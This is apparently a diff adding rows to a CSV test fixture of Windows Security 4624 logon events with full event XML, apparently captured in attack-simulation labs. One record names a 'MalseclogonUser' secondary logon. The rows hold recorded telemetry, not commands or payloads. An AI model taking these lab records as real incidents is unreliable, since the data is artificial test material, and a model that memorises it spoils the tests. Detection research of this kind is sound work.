+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">l</Data>
+    <Data Name=""TargetOutboundDomainName"">o</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.616154Z"">
+    </TimeCreated>
+    <EventRecordID>329918</EventRecordID>
+    <Correlation ActivityID=""B04CB785-EBD3-0000-16B8-4CB0D3EBD701"">
+    </Correlation>
+    <Execution ProcessID=""636"" ThreadID=""7156"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1bc4</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">MalseclogonUser</Data>
+    <Data Name=""TargetOutboundDomainName"">MalseclogonDomain</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:00.800072Z"">
+    </TimeCreated>
+    <EventRecordID>21373</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""9984"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:54.272334Z"">
+    </TimeCreated>
+    <EventRecordID>21371</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821f28</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:47.653255Z"">
+    </TimeCreated>
+    <EventRecordID>21369</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""740"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x821aab</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63652</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:41:37.642369Z"">
+    </TimeCreated>
+    <EventRecordID>21367</EventRecordID>
+    <Correlation ActivityID=""AD9FD595-5D0F-0001-C2D5-9FAD0F5DD801"">
+    </Correlation>
+    <Execution ProcessID=""704"" ThreadID=""10224"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-81107902-1099128984-1836738286-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x820d61</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">59CEFB69-4F9D-7486-C449-471E00B814E3</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.1.219</Data>
+    <Data Name=""IpPort"">63640</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-11-15T08:19:16.102509Z"">
+    </TimeCreated>
+    <EventRecordID>25049</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""516"" ThreadID=""308"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x1d12916</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">59336</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:53.407618Z"">
+    </TimeCreated>
+    <EventRecordID>769798</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""1820"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x85516e</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">063B0961-D1B7-6D2C-1FF3-98764C4FAC9D</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">53668</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-17T10:57:44.270428Z"">
+    </TimeCreated>
+    <EventRecordID>769794</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""584"" ThreadID=""640"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x853237</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">02694W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.37</Data>
+    <Data Name=""IpPort"">49959</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:23.206182Z"">
+    </TimeCreated>
+    <EventRecordID>65971</EventRecordID>
+    <Correlation ActivityID=""E7B51CDE-BAD3-0000-481F-B5E7D3BAD401"">
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1280"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24db24</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50152</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:22.563018Z"">
+    </TimeCreated>
+    <EventRecordID>65969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-2895268558-4179327395-2773671012-1108</Data>
+    <Data Name=""TargetUserName"">EXCHANGE$</Data>
+    <Data Name=""TargetDomainName"">ICORP</Data>
+    <Data Name=""TargetLogonId"">0x24daa6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">EXCHANGE</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.111.87</Data>
+    <Data Name=""IpPort"">58128</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:16:58.787262Z"">
+    </TimeCreated>
+    <EventRecordID>65967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24c879</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">94BA67EA-8490-3C86-6DB7-DF74C9AA4449</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50151</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-05T09:39:30.697730Z"">
+    </TimeCreated>
+    <EventRecordID>10113</EventRecordID>
+    <Correlation ActivityID=""FDC063DE-4B69-0000-5564-C0FD694BD501"">
+    </Correlation>
+    <Execution ProcessID=""620"" ThreadID=""5596"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x2e4ce</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
